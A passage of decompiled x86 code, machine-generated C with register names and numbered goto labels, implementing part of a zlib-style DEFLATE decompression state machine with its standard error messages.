                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        										 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        										 *(__ebp - 8) = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0x20;
                                                                                                                                                                                        										if(__edi < 0x20) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L143;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L322;
                                                                                                                                                                                        								case 0xa:
                                                                                                                                                                                        									L144:
                                                                                                                                                                                        									__eax = 0;
                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                        									L145:
                                                                                                                                                                                        									__eflags = __ebx[3] - __eax;
                                                                                                                                                                                        									if(__ebx[3] == __eax) {
                                                                                                                                                                                        										L316:
                                                                                                                                                                                        										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                        										 *(__esi + 0xc) =  *(__ebp - 0x1c);
                                                                                                                                                                                        										__eax =  *(__ebp - 0x18);
                                                                                                                                                                                        										 *(__esi + 0x10) =  *(__ebp - 0x18);
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										 *__esi =  *(__ebp - 8);
                                                                                                                                                                                        										 *(__esi + 4) = __ecx;
                                                                                                                                                                                        										__ebx[0xe] = __edx;
                                                                                                                                                                                        										__ebx[0xf] = __edi;
                                                                                                                                                                                        										_push(2);
                                                                                                                                                                                        										goto L137;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L146:
                                                                                                                                                                                        									__eax = E01322E91(__eax, __eax, __eax);
                                                                                                                                                                                        									__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        									__ecx =  *(__ebp - 4);
                                                                                                                                                                                        									__ebx[6] = __eax;
                                                                                                                                                                                        									 *(__esi + 0x30) = __eax;
                                                                                                                                                                                        									 *__ebx = 0xb;
                                                                                                                                                                                        									goto L147;
                                                                                                                                                                                        								case 0xb:
                                                                                                                                                                                        									L147:
                                                                                                                                                                                        									__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 5;
                                                                                                                                                                                        									if( *((intOrPtr*)(__ebp + 0xc)) == 5) {
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L148:
                                                                                                                                                                                        									__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                                                        									if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L149;
                                                                                                                                                                                        								case 0xc:
                                                                                                                                                                                        									L149:
                                                                                                                                                                                        									__eflags = __ebx[1];
                                                                                                                                                                                        									if(__ebx[1] == 0) {
                                                                                                                                                                                        										L151:
                                                                                                                                                                                        										__eflags = __edi - 3;
                                                                                                                                                                                        										if(__edi >= 3) {
                                                                                                                                                                                        											L155:
                                                                                                                                                                                        											__eax = __edx;
                                                                                                                                                                                        											__edx = __edx >> 1;
                                                                                                                                                                                        											__ebx[1] = __eax;
                                                                                                                                                                                        											__edx = __edx & 0x00000003;
                                                                                                                                                                                        											__eax = __edx & 0x00000003;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax == 0) {
                                                                                                                                                                                        												L163:
                                                                                                                                                                                        												 *__ebx = 0xd;
                                                                                                                                                                                        												L164:
                                                                                                                                                                                        												__edx = __edx >> 2;
                                                                                                                                                                                        												__edi = __edi - 3;
                                                                                                                                                                                        												L21:
                                                                                                                                                                                        												 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        												 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        												goto L134;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L156:
                                                                                                                                                                                        											__eax = __eax - 1;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax == 0) {
                                                                                                                                                                                        												L161:
                                                                                                                                                                                        												__eax = E01321718(__ebx);
                                                                                                                                                                                        												 *__ebx = 0x13;
                                                                                                                                                                                        												__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                                                        												if( *((intOrPtr*)(__ebp + 0xc)) != 6) {
                                                                                                                                                                                        													goto L164;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L162:
                                                                                                                                                                                        												__edx = __edx >> 2;
                                                                                                                                                                                        												__edi = __edi - 3;
                                                                                                                                                                                        												 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L157:
                                                                                                                                                                                        											__eax = __eax - 1;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax == 0) {
                                                                                                                                                                                        												_push(0x10);
                                                                                                                                                                                        												_pop(__eax);
                                                                                                                                                                                        												 *__ebx = __eax;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												__eax = __eax - 1;
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        												if(__eax == 0) {
                                                                                                                                                                                        													 *(__esi + 0x18) = "invalid block type";
                                                                                                                                                                                        													 *__ebx = 0x1d;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L164;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L152:
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L153:
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L154:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edx = __edx + __eax;
                                                                                                                                                                                        											__eax =  *(__ebp - 8);
                                                                                                                                                                                        											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											__eflags = __edi - 3;
                                                                                                                                                                                        											if(__edi < 3) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L155;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L150:
                                                                                                                                                                                        									__ecx = __edi;
                                                                                                                                                                                        									 *__ebx = 0x1a;
                                                                                                                                                                                        									__ecx = __edi & 0x00000007;
                                                                                                                                                                                        									__edx = __edx >> __cl;
                                                                                                                                                                                        									__edi = __edi - __ecx;
                                                                                                                                                                                        									 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        									 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        									goto L134;
                                                                                                                                                                                        								case 0xd:
                                                                                                                                                                                        									L165:
                                                                                                                                                                                        									__edi = __edi & 0x00000007;
                                                                                                                                                                                        									__edi = __edi - (__edi & 0x00000007);
                                                                                                                                                                                        									__edx = __edx >> __cl;
                                                                                                                                                                                        									 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        									 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        									__eflags = __edi - 0x20;
                                                                                                                                                                                        									if(__edi >= 0x20) {
                                                                                                                                                                                        										L169:
                                                                                                                                                                                        										__eax = __edx;
                                                                                                                                                                                        										__ecx = __edx;
                                                                                                                                                                                        										__eax =  !__edx;
                                                                                                                                                                                        										__ecx = __edx & 0x0000ffff;
                                                                                                                                                                                        										__eax =  !__edx >> 0x10;
                                                                                                                                                                                        										__eflags = __ecx -  !__edx >> 0x10;
                                                                                                                                                                                        										if(__ecx ==  !__edx >> 0x10) {
                                                                                                                                                                                        											L171:
                                                                                                                                                                                        											__eax = 0;
                                                                                                                                                                                        											__ebx[0x10] = __ecx;
                                                                                                                                                                                        											__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edi = 0;
                                                                                                                                                                                        											 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        											 *(__ebp - 0x10) = 0;
                                                                                                                                                                                        											 *__ebx = 0xe;
                                                                                                                                                                                        											if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                                                                                                        												goto L323;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L172;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L170:
                                                                                                                                                                                        										 *(__esi + 0x18) = "invalid stored block lengths";
                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L166:
                                                                                                                                                                                        									__eax =  *(__ebp - 8);
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L167:
                                                                                                                                                                                        										__ecx =  *(__ebp - 4);
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L323;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L168:
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        										__eax =  *(__ebp - 8);
                                                                                                                                                                                        										__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        										 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        										 *(__ebp - 8) = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0x20;
                                                                                                                                                                                        										if(__edi < 0x20) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L169;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L323;
                                                                                                                                                                                        								case 0xe:
                                                                                                                                                                                        									L172:
                                                                                                                                                                                        									 *__ebx = 0xf;
                                                                                                                                                                                        									goto L173;
                                                                                                                                                                                        								case 0xf:
                                                                                                                                                                                        									L173:
                                                                                                                                                                                        									__eax = __ebx[0x10];
                                                                                                                                                                                        									__eflags = __eax;
                                                                                                                                                                                        									if(__eax == 0) {
                                                                                                                                                                                        										L176:
                                                                                                                                                                                        										 *__ebx = 0xb;
                                                                                                                                                                                        										goto L135;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L174:
                                                                                                                                                                                        									__eflags = __eax - __ecx;
                                                                                                                                                                                        									__eax =  >  ? __ecx : __eax;
                                                                                                                                                                                        									__eflags = __eax -  *(__ebp - 0x18);
                                                                                                                                                                                        									__eax =  >  ?  *(__ebp - 0x18) : __eax;
                                                                                                                                                                                        									 *(__ebp - 0x34) = __eax;
                                                                                                                                                                                        									__eflags = __eax;
                                                                                                                                                                                        									if(__eax == 0) {
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L175:
                                                                                                                                                                                        									__eax = memcpy( *(__ebp - 0x1c),  *(__ebp - 8), __eax);
                                                                                                                                                                                        									__eax =  *(__ebp - 0x34);
                                                                                                                                                                                        									__esp = __esp + 0xc;
                                                                                                                                                                                        									__ecx =  *(__ebp - 4);
                                                                                                                                                                                        									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                                                        									__ecx =  *(__ebp - 4) - __eax;
                                                                                                                                                                                        									 *(__ebp - 0x18) =  *(__ebp - 0x18) - __eax;
                                                                                                                                                                                        									 *(__ebp - 0x1c) =  *(__ebp - 0x1c) + __eax;
                                                                                                                                                                                        									__ebx[0x10] = __ebx[0x10] - __eax;
                                                                                                                                                                                        									__edx =  *(__ebp - 0xc);
                                                                                                                                                                                        									 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        									goto L135;
                                                                                                                                                                                        								case 0x10:
                                                                                                                                                                                        									goto L0;
                                                                                                                                                                                        								case 0x11:
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L189:
                                                                                                                                                                                        										__eflags = _t920[0x1a] - _t920[0x17];
                                                                                                                                                                                        										if(_t920[0x1a] >= _t920[0x17]) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L184:
                                                                                                                                                                                        										__eflags = _t1103 - 3;
                                                                                                                                                                                        										if(_t1103 >= 3) {
                                                                                                                                                                                        											L188:
                                                                                                                                                                                        											_t944 = _t1054 & 0x00000007;
                                                                                                                                                                                        											_t1054 = _t1054 >> 3;
                                                                                                                                                                                        											 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        											 *(_t920 + 0x70 + ( *(0x1324908 + _t920[0x1a] * 2) & 0x0000ffff) * 2) = _t944;
                                                                                                                                                                                        											_t920[0x1a] = _t920[0x1a] + 1;
                                                                                                                                                                                        											_t1103 = _t1103 - 3;
                                                                                                                                                                                        											__eflags = _t1103;
                                                                                                                                                                                        											_t928 =  *(_t1164 - 4);
                                                                                                                                                                                        											 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L185:
                                                                                                                                                                                        										_t804 =  *(_t1164 - 8);
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L186:
                                                                                                                                                                                        											__eflags = _t928;
                                                                                                                                                                                        											if(_t928 == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L187:
                                                                                                                                                                                        											 *(_t1164 - 4) = _t928 - 1;
                                                                                                                                                                                        											_t806 = ( *_t804 & 0x000000ff) << _t1103;
                                                                                                                                                                                        											_t1103 = _t1103 + 8;
                                                                                                                                                                                        											_t928 =  *(_t1164 - 4);
                                                                                                                                                                                        											_t1054 = _t1054 + _t806;
                                                                                                                                                                                        											_t804 =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                                                        											 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        											 *(_t1164 - 8) = _t804;
                                                                                                                                                                                        											__eflags = _t1103 - 3;
                                                                                                                                                                                        											if(_t1103 < 3) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L188;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L190:
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L192:
                                                                                                                                                                                        										__eflags = _t920[0x1a] - 0x13;
                                                                                                                                                                                        										if(_t920[0x1a] >= 0x13) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L191:
                                                                                                                                                                                        										 *(_t920 + 0x70 + ( *(0x1324908 + _t920[0x1a] * 2) & 0x0000ffff) * 2) = 0;
                                                                                                                                                                                        										_t368 =  &(_t920[0x1a]);
                                                                                                                                                                                        										 *_t368 = _t920[0x1a] + 1;
                                                                                                                                                                                        										__eflags =  *_t368;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L193:
                                                                                                                                                                                        									_t810 =  &(_t920[0x14c]);
                                                                                                                                                                                        									_t920[0x13] = _t810;
                                                                                                                                                                                        									_t920[0x1b] = _t810;
                                                                                                                                                                                        									_t920[0x15] = 7;
                                                                                                                                                                                        									_t813 = E013233B4(0,  &(_t920[0x1c]), 0x13,  &(_t920[0x1b]),  &(_t920[0x15]),  &(_t920[0xbc]));
                                                                                                                                                                                        									_t1166 = _t1166 + 0x18;
                                                                                                                                                                                        									 *(_t1164 - 0x20) = _t813;
                                                                                                                                                                                        									__eflags = _t813;
                                                                                                                                                                                        									if(_t813 == 0) {
                                                                                                                                                                                        										L196:
                                                                                                                                                                                        										_t920[0x1a] = _t920[0x1a] & 0x00000000;
                                                                                                                                                                                        										 *_t920 = 0x12;
                                                                                                                                                                                        										goto L224;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L194:
                                                                                                                                                                                        									_t1125[6] = "invalid code lengths set";
                                                                                                                                                                                        									goto L195;
                                                                                                                                                                                        								case 0x12:
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L224:
                                                                                                                                                                                        										_t949 = _t920[0x1a];
                                                                                                                                                                                        										 *(_t1164 - 0x2c) = _t949;
                                                                                                                                                                                        										__eflags = _t949 - _t920[0x19] + _t920[0x18];
                                                                                                                                                                                        										if(_t949 < _t920[0x19] + _t920[0x18]) {
                                                                                                                                                                                        											goto L199;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L199:
                                                                                                                                                                                        											_t817 =  *((intOrPtr*)(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 &  *(_t1164 - 0xc)) * 4));
                                                                                                                                                                                        											 *(_t1164 - 0x34) = _t817;
                                                                                                                                                                                        											__eflags = (_t817 >> 0x00000008 & 0x000000ff) - _t1103;
                                                                                                                                                                                        											if((_t817 >> 0x00000008 & 0x000000ff) <= _t1103) {
                                                                                                                                                                                        												break;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L197:
                                                                                                                                                                                        											_t935 =  *(_t1164 - 4);
                                                                                                                                                                                        											__eflags = _t935;
                                                                                                                                                                                        											if(_t935 == 0) {
                                                                                                                                                                                        												goto L323;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L198:
                                                                                                                                                                                        											_t1072 =  *(_t1164 - 8);
                                                                                                                                                                                        											 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                                                        											 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + (( *_t1072 & 0x000000ff) << _t1103);
                                                                                                                                                                                        											 *(_t1164 - 8) =  &(_t1072[1]);
                                                                                                                                                                                        											_t1103 = _t1103 + 8;
                                                                                                                                                                                        											__eflags = _t1103;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L200:
                                                                                                                                                                                        										_push(0x10);
                                                                                                                                                                                        										_t1075 = _t817 >> 0x10;
                                                                                                                                                                                        										_pop(_t956);
                                                                                                                                                                                        										__eflags = _t1075 - _t956;
                                                                                                                                                                                        										if(__eflags >= 0) {
                                                                                                                                                                                        											L202:
                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                        												L208:
                                                                                                                                                                                        												_t1076 =  *(_t1164 - 0xc);
                                                                                                                                                                                        												_push(0x11);
                                                                                                                                                                                        												_pop(_t957);
                                                                                                                                                                                        												__eflags =  *(_t1164 - 0x32) - _t957;
                                                                                                                                                                                        												_t958 = _t817 & 0x000000ff;
                                                                                                                                                                                        												if( *(_t1164 - 0x32) != _t957) {
                                                                                                                                                                                        													L214:
                                                                                                                                                                                        													 *(_t1164 - 0x10) = _t958;
                                                                                                                                                                                        													while(1) {
                                                                                                                                                                                        														L215:
                                                                                                                                                                                        														_t432 = _t958 + 7; // 0x18
                                                                                                                                                                                        														__eflags = _t1103 - _t432;
                                                                                                                                                                                        														if(_t1103 >= _t432) {
                                                                                                                                                                                        															break;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														L216:
                                                                                                                                                                                        														_t935 =  *(_t1164 - 4);
                                                                                                                                                                                        														__eflags = _t935;
                                                                                                                                                                                        														if(_t935 == 0) {
                                                                                                                                                                                        															goto L323;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														L217:
                                                                                                                                                                                        														 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                                                        														_t958 =  *(_t1164 - 0x10);
                                                                                                                                                                                        														_t1076 = _t1076 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t1103);
                                                                                                                                                                                        														 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                                                        														_t1103 = _t1103 + 8;
                                                                                                                                                                                        														 *(_t1164 - 0xc) = _t1076;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L218:
                                                                                                                                                                                        													_t1077 = _t1076 >> _t958;
                                                                                                                                                                                        													_t1078 = _t1077 >> 7;
                                                                                                                                                                                        													_push(0xfffffff9);
                                                                                                                                                                                        													_pop(_t821);
                                                                                                                                                                                        													_t961 = (_t1077 & 0x0000007f) + 0xb;
                                                                                                                                                                                        													_t822 = _t821 -  *(_t1164 - 0x10);
                                                                                                                                                                                        													__eflags = _t822;
                                                                                                                                                                                        													L219:
                                                                                                                                                                                        													 *(_t1164 - 0x34) =  *(_t1164 - 0x34) & 0x00000000;
                                                                                                                                                                                        													_t1103 = _t1103 + _t822;
                                                                                                                                                                                        													__eflags = _t1103;
                                                                                                                                                                                        													L220:
                                                                                                                                                                                        													 *(_t1164 - 0x30) = _t961;
                                                                                                                                                                                        													 *(_t1164 - 0xc) = _t1078;
                                                                                                                                                                                        													 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        													__eflags = _t961 +  *(_t1164 - 0x2c) - _t920[0x19] + _t920[0x18];
                                                                                                                                                                                        													if(_t961 +  *(_t1164 - 0x2c) > _t920[0x19] + _t920[0x18]) {
                                                                                                                                                                                        														L227:
                                                                                                                                                                                        														_t1125[6] = "invalid bit length repeat";
                                                                                                                                                                                        														 *_t920 = 0x1d;
                                                                                                                                                                                        														L228:
                                                                                                                                                                                        														__eflags =  *_t920 - 0x1d;
                                                                                                                                                                                        														if( *_t920 == 0x1d) {
                                                                                                                                                                                        															L133:
                                                                                                                                                                                        															_t1054 =  *(_t1164 - 0xc);
                                                                                                                                                                                        															goto L134;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														L229:
                                                                                                                                                                                        														__eflags = _t920[0x9c];
                                                                                                                                                                                        														if(_t920[0x9c] != 0) {
                                                                                                                                                                                        															L231:
                                                                                                                                                                                        															_t826 =  &(_t920[0x14c]);
                                                                                                                                                                                        															_t920[0x13] = _t826;
                                                                                                                                                                                        															_t920[0x1b] = _t826;
                                                                                                                                                                                        															_t920[0x15] = 9;
                                                                                                                                                                                        															_t829 = E013233B4(1,  &(_t920[0x1c]), _t920[0x18],  &(_t920[0x1b]),  &(_t920[0x15]),  &(_t920[0xbc]));
                                                                                                                                                                                        															_t1166 = _t1166 + 0x18;
                                                                                                                                                                                        															 *(_t1164 - 0x20) = _t829;
                                                                                                                                                                                        															__eflags = _t829;
                                                                                                                                                                                        															if(_t829 == 0) {
                                                                                                                                                                                        																L233:
                                                                                                                                                                                        																_t920[0x14] = _t920[0x1b];
                                                                                                                                                                                        																_t920[0x16] = 6;
                                                                                                                                                                                        																_t835 = E013233B4(2, _t920 + (_t920[0x18] + 0x38) * 2, _t920[0x19],  &(_t920[0x1b]),  &(_t920[0x16]),  &(_t920[0xbc]));
                                                                                                                                                                                        																_t1166 = _t1166 + 0x18;
                                                                                                                                                                                        																 *(_t1164 - 0x20) = _t835;
                                                                                                                                                                                        																__eflags = _t835;
                                                                                                                                                                                        																if(_t835 == 0) {
                                                                                                                                                                                        																	L235:
                                                                                                                                                                                        																	__eflags =  *((intOrPtr*)(_t1164 + 0xc)) - 6;
                                                                                                                                                                                        																	_t935 =  *(_t1164 - 4);
                                                                                                                                                                                        																	 *_t920 = 0x13;
                                                                                                                                                                                        																	if( *((intOrPtr*)(_t1164 + 0xc)) == 6) {
                                                                                                                                                                                        																		goto L323;
                                                                                                                                                                                        																	}
                                                                                                                                                                                        																	L236:
                                                                                                                                                                                        																	_t1081 =  *(_t1164 - 0xc);
                                                                                                                                                                                        																	goto L237;
                                                                                                                                                                                        																}
                                                                                                                                                                                        																L234:
                                                                                                                                                                                        																_t1125[6] = "invalid distances set";
                                                                                                                                                                                        																L195:
                                                                                                                                                                                        																 *_t920 = 0x1d;
                                                                                                                                                                                        																goto L133;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															L232:
                                                                                                                                                                                        															_t1125[6] = "invalid literal/lengths set";
                                                                                                                                                                                        															goto L195;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														L230:
                                                                                                                                                                                        														_t1125[6] = "invalid code -- missing end-of-block";
                                                                                                                                                                                        														goto L195;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L221:
                                                                                                                                                                                        													_t1036 =  *(_t1164 - 0x30);
                                                                                                                                                                                        													__eflags = _t1036;
                                                                                                                                                                                        													if(_t1036 == 0) {
                                                                                                                                                                                        														continue;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L222:
                                                                                                                                                                                        													_t1098 =  *(_t1164 - 0x34);
                                                                                                                                                                                        													do {
                                                                                                                                                                                        														L223:
                                                                                                                                                                                        														 *(_t920 + 0x70 + _t920[0x1a] * 2) = _t1098;
                                                                                                                                                                                        														_t920[0x1a] = _t920[0x1a] + 1;
                                                                                                                                                                                        														_t1036 = _t1036 - 1;
                                                                                                                                                                                        														__eflags = _t1036;
                                                                                                                                                                                        													} while (_t1036 != 0);
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L209:
                                                                                                                                                                                        												 *(_t1164 - 0x10) = _t958;
                                                                                                                                                                                        												while(1) {
                                                                                                                                                                                        													L210:
                                                                                                                                                                                        													_t422 = _t958 + 3; // 0x14
                                                                                                                                                                                        													__eflags = _t1103 - _t422;
                                                                                                                                                                                        													if(_t1103 >= _t422) {
                                                                                                                                                                                        														break;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L211:
                                                                                                                                                                                        													_t935 =  *(_t1164 - 4);
                                                                                                                                                                                        													__eflags = _t935;
                                                                                                                                                                                        													if(_t935 == 0) {
                                                                                                                                                                                        														goto L323;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L212:
                                                                                                                                                                                        													 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                                                        													_t958 =  *(_t1164 - 0x10);
                                                                                                                                                                                        													_t1076 = _t1076 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t1103);
                                                                                                                                                                                        													 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                                                        													_t1103 = _t1103 + 8;
                                                                                                                                                                                        													 *(_t1164 - 0xc) = _t1076;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L213:
                                                                                                                                                                                        												_t1099 = _t1076 >> _t958;
                                                                                                                                                                                        												_t1078 = _t1099 >> 3;
                                                                                                                                                                                        												_push(0xfffffffd);
                                                                                                                                                                                        												_pop(_t912);
                                                                                                                                                                                        												_t961 = (_t1099 & 0x00000007) + 3;
                                                                                                                                                                                        												_t822 = _t912 -  *(_t1164 - 0x10);
                                                                                                                                                                                        												goto L219;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L203:
                                                                                                                                                                                        											_t1046 = (_t817 >> 0x00000008 & 0x000000ff) + 2;
                                                                                                                                                                                        											 *(_t1164 - 0x34) = _t1046;
                                                                                                                                                                                        											__eflags = _t1103 - _t1046;
                                                                                                                                                                                        											if(_t1103 >= _t1046) {
                                                                                                                                                                                        												L206:
                                                                                                                                                                                        												_t1047 = _t817 & 0x000000ff;
                                                                                                                                                                                        												_t916 =  *(_t1164 - 0x2c);
                                                                                                                                                                                        												_t1103 = _t1103 - _t1047;
                                                                                                                                                                                        												_t1054 =  *(_t1164 - 0xc) >> _t1047;
                                                                                                                                                                                        												 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        												 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        												__eflags = _t916;
                                                                                                                                                                                        												if(_t916 == 0) {
                                                                                                                                                                                        													L226:
                                                                                                                                                                                        													_t1125[6] = "invalid bit length repeat";
                                                                                                                                                                                        													goto L17;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L207:
                                                                                                                                                                                        												_t1078 = _t1054 >> 2;
                                                                                                                                                                                        												_t961 = (_t1054 & 0x00000003) + 3;
                                                                                                                                                                                        												 *(_t1164 - 0x34) =  *(_t920 + 0x6e + _t916 * 2) & 0x0000ffff;
                                                                                                                                                                                        												_t1103 = _t1103 - 2;
                                                                                                                                                                                        												goto L220;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												goto L204;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												L204:
                                                                                                                                                                                        												_t935 =  *(_t1164 - 4);
                                                                                                                                                                                        												__eflags = _t935;
                                                                                                                                                                                        												if(_t935 == 0) {
                                                                                                                                                                                        													goto L323;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L205:
                                                                                                                                                                                        												 *(_t1164 - 4) = _t935 - 1;
                                                                                                                                                                                        												_t1102 = ( *( *(_t1164 - 8)) & 0x000000ff) << _t1103;
                                                                                                                                                                                        												_t1103 = _t1103 + 8;
                                                                                                                                                                                        												 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + _t1102;
                                                                                                                                                                                        												 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                                                                                                        												__eflags = _t1103 -  *(_t1164 - 0x34);
                                                                                                                                                                                        												if(_t1103 <  *(_t1164 - 0x34)) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L206;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L323;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L201:
